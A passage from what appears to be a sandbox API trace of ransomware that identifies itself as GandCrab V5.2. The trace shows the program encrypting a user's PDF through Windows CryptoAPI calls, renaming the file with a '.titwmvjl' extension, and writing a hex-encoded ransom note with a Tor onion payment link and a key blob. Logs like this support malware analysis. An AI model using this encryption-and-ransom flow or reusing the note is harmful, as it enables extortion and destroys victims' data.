lpString2="NTDETECT.COM") returned -1 [0089.633] lstrcmpiW (lpString1="94_Hb-8K5E.pdf", lpString2="Bootfont.bin") returned -1 [0089.633] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\94_Hb-8K5E.pdf") returned 57 [0089.633] lstrlenW (lpString=".pdf") returned 4 [0089.633] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.633] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".pdf ") returned 5 [0089.633] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.634] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.634] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\94_Hb-8K5E.pdf" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\94_hb-8k5e.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0089.634] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.634] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0089.635] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.635] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.635] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0089.636] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.636] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.636] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.636] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0089.636] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.637] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.637] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.684] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.684] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0089.685] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.685] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.685] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.685] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0089.686] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.686] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.686] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.686] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.686] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0089.687] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.687] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5033b8) returned 1 [0089.687] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.687] CryptGetKeyParam (in: hKey=0x5033b8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0089.687] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.687] CryptEncrypt (in: hKey=0x5033b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0089.688] GetLastError () returned 0x0 [0089.688] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.688] CryptDestroyKey (hKey=0x5033b8) returned 1 [0089.688] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.688] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.688] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.688] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0089.689] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.689] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503278) returned 1 [0089.689] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.690] CryptGetKeyParam (in: hKey=0x503278, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0089.690] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.690] CryptEncrypt (in: hKey=0x503278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0089.690] GetLastError () returned 0x0 [0089.690] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.690] CryptDestroyKey (hKey=0x503278) returned 1 [0089.690] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.690] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.690] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0089.690] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0089.691] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x187da, lpOverlapped=0x0) returned 1 [0089.697] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffe7826, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.697] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x187da, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x187da, lpOverlapped=0x0) returned 1 [0089.699] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.699] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0089.701] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.704] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.705] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.705] CloseHandle (hObject=0x2b4) returned 1 [0089.705] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\94_Hb-8K5E.pdf" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\94_hb-8k5e.pdf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\94_Hb-8K5E.pdf.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\94_hb-8k5e.pdf.titwmvjl"), dwFlags=0x1) returned 1 [0089.706] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.706] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0089.706] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0089.706] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0089.706] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\d2ca4a09d2ca4deb61a.lock" [0089.706] lstrlenW (lpString=".titwmvjl") returned 9 [0089.706] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\d2ca4a09d2ca4deb61a.lock") returned 67 [0089.706] VirtualAlloc (lpAddress=0x0, dwSize=0xc6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.707] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 76 [0089.707] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\d2ca4a09d2ca4deb61a.lock") returned 67 [0089.707] lstrlenW (lpString=".lock") returned 5 [0089.707] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.707] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0089.707] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.707] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.707] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0089.707] lstrcmpW (lpString1="GhzE5QHKEIrI", lpString2=".") returned 1 [0089.707] lstrcmpW (lpString1="GhzE5QHKEIrI", lpString2="..") returned 1 [0089.707] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\", lpString2="GhzE5QHKEIrI" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI" [0089.707] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\" [0089.708] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0089.708] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0089.708] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0089.708] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0089.708] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0089.708] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0089.708] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0089.708] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0089.708] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0089.708] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.709] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.709] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\\\TITWMVJL-DECRYPT.txt") returned 77 [0089.709] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\GhzE5QHKEIrI\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\ghze5qhkeiri\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0089.709] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38